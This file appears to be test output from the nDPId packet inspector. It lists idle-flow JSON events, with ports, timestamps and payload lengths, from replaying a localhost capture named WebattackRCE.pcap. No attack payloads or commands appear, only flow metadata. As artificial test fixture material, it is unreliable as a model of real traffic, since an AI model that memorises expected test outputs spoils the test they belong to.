+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 